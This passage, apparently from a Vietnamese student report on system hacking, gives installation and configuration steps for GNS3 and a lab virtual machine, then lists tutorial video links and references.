  • 55. System Hacking Sau khi hoàn tất, để cài máy ảo bạn Chọn "Start this Vitual Machine" Và bạn thực hiện cài bình thường như cài cho máy thật. 3. Cài đặt GNS3: GNS3 có thể chạy trên Windows,Linux và Mac OSX.Để cài đặt phần mềm trên Window dễ dàng chúng ta có thể sử dụng bộ cài đặt all-in-one cung cấp mọi thứ bạn cần để chạy được GNS3. Các bạn chọn file GNS3.exe trong phần thầy giáo gửi. Tiến hành cài đặt Huỳnh Minh Trí Page 54
  • 56. System Hacking Huỳnh Minh Trí Page 55
  • 57. System Hacking Huỳnh Minh Trí Page 56
  • 58. System Hacking Huỳnh Minh Trí Page 57
  • 59. System Hacking Giao diện GNS3 sau khi cài đặt xong 3. Cấu hình cho GNS3: Vào Edit > Add IOS images and hypervisors chỉ đường dẫn đến các file IOS trong mục Setting Huỳnh Minh Trí Page 58
  • 60. System Hacking Các bạn vào phần Image file: vào chọn đường dẫn tới phần tài liệu của thầy giáo gửi có đính kèm file :c2691-adventerprisek9-mz.124-25c.bin Huỳnh Minh Trí Page 59
  • 61. System Hacking Sau khi chọn đường dẫn xong các bạn nhấn Save. Vào Edit > Preferences > Dynamips > Trong mục Excutable Path chọn đường dẫn đến tập tin dynamip-wxp.exe trong thư mục cài đặt GNS3 , sau đó bấm vào nút Test để kiểm tra lại hoạt động của Dynamip. Huỳnh Minh Trí Page 60
  • 62. System Hacking Huỳnh Minh Trí Page 61
  • 63. System Hacking Nhấn ok. Kéo thả các router đã có IOS vào để triển khai 1 mô hình đơn giản. Huỳnh Minh Trí Page 62
  • 64. System Hacking CÁC CLIP HƯỚNG DẪN https://www.youtube.com/watch?v=V_l_JNnH2GU&list=UUc8- uuS3IRvbEk1EOjrVYEQ https://www.youtube.com/watch?v=wU-l1dO5ZqE&index=2&list=UUc8- uuS3IRvbEk1EOjrVYEQ https://www.youtube.com/watch?v=fasOuWKRnx0&list=UUc8- uuS3IRvbEk1EOjrVYEQ&index=9 https://www.youtube.com/watch?v=fQ5qC4E11Do&list=UUc8- uuS3IRvbEk1EOjrVYEQ https://www.youtube.com/watch?v=5liS6E1ge90&list=UUc8- uuS3IRvbEk1EOjrVYEQ&index=2 https://www.youtube.com/watch?v=INkaadmMras&list=UUc8- uuS3IRvbEk1EOjrVYEQ&index=3 https://www.youtube.com/watch?v=6ADhFh7f0h8&index=4&list=UUc8- uuS3IRvbEk1EOjrVYEQ Huỳnh Minh Trí Page 63
  • 65. System Hacking DANH MỤC TÀI LIỆU THAM KHẢO http://suamaytinhtainha.info/thu-thuat-may-tinh/cach-hack-may- tinh-trong-mang-lan-bang-backtrack-5.html https://www.mediafire.com/folder/laq7hirml1w5g/Athena- TaiLieu http://athena.edu.vn/video/an-ninh-mang Huỳnh Minh Trí Page 64